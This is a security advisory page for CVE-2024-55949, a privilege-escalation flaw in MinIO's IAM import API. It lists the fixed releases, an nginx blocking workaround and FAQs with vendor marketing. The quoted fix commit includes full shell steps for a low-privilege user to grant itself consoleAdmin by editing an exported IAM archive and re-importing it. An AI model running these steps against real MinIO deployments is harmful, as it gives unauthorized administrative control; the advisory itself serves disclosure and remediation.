Summary
Workarounds
There are no workarounds possible, all users are advised to upgrade immediately if you don't run MinIO behind a load balancer.
Behind a load balancer / firewall such as nginx .
location /minio/admin/v2/import-iam {
...
}
location /minio/admin/v3/import-iam-v2 {
...
Following locations can be blocked from external access, temporarily disallowing the API calls completely until the deployments can be upgraded.
References
Refer https://github.com/minio/minio/pull/20756 for more information
Binary Releases
AiStor Containers
quay.io/minio/aistor/minio:RELEASE.2024-12-13T13-42-41Z
quay.io/minio/aistor/minio:RELEASE.2024-12-13T13-42-41Z.fips
AiStor Binaries
Architecture: linux/amd64
Architecture: linux/arm64
Architecture: windows/amd64
Community Containers
quay.io/minio/minio:RELEASE.2024-12-13T22-19-12Z
quay.io/minio/minio:RELEASE.2024-12-13T22-19-12Z.fips
Community Binaries
Architecture: linux/amd64
Architecture: linux/arm64
Architecture: windows/amd64
Credits
Credit goes to National Security Agency for reporting this issue.
Impact
Privilege escalation in IAM import API, all users are impacted since MinIO commit 580d9db85e04f1b63cc2909af50f0ed08afa965f
The application assigns, modifies, tracks, or checks privileges incorrectly, allowing a user to gain elevated access. Typical impact: privilege escalation beyond the intended level.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
commit f246c9053f9603e610d98439799bdd2a6b293427
Author: Aditya Manthramurthy <[email protected]>
Date: Wed Dec 11 18:09:40 2024 -0800
fix: Privilege escalation in IAM import API (#20756)
This API had missing permissions checking, allowing a user to change
their policy mapping by:
1. Craft iam-info.zip file: Update own user permission in
user_mappings.json
2. Upload it via `mc admin cluster iam import nobody iam-info.zip`
Here `nobody` can be a user with pretty much any kind of permission (but
not anonymous) and this ends up working.
Some more detailed steps - start from a fresh setup:
```
./minio server /tmp/d{1...4} &
mc alias set myminio http://localhost:9000 minioadmin minioadmin
mc admin user add myminio nobody nobody123
mc admin policy attach myminio readwrite nobody nobody123
mc alias set nobody http://localhost:9000 nobody nobody123
mc admin cluster iam export myminio
mkdir /tmp/x && mv myminio-iam-info.zip /tmp/x
cd /tmp/x
unzip myminio-iam-info.zip
echo '{"nobody":{"version":1,"policy":"consoleAdmin","updatedAt":"2024-08-13T19:47:10.1Z"}}' > \
iam-assets/user_mappings.json
zip -r myminio-iam-info-updated.zip iam-assets/
mc admin cluster iam import nobody ./myminio-iam-info-updated.zip
mc admin service restart nobody
```
Frequently Asked Questions
- What is CVE-2024-55949? CVE-2024-55949 is a high-severity improper privilege management vulnerability in github.com/minio/minio (go), affecting versions >= 0.0.0-20220623162515-580d9db85e04, < 0.0.0-20241213221912-68b004a48f41. It is fixed in 0.0.0-20241213221912-68b004a48f41. The application assigns, modifies, tracks, or checks privileges incorrectly, allowing a user to gain elevated access.
- Which versions of github.com/minio/minio are affected by CVE-2024-55949? github.com/minio/minio (go) versions >= 0.0.0-20220623162515-580d9db85e04, < 0.0.0-20241213221912-68b004a48f41 is affected.
- Is there a fix for CVE-2024-55949? Yes. CVE-2024-55949 is fixed in 0.0.0-20241213221912-68b004a48f41. Upgrade to this version or later.
- Is CVE-2024-55949 exploitable, and should I be worried? Whether CVE-2024-55949 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2024-55949 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2024-55949? Upgrade
github.com/minio/minioto 0.0.0-20241213221912-68b004a48f41 or later.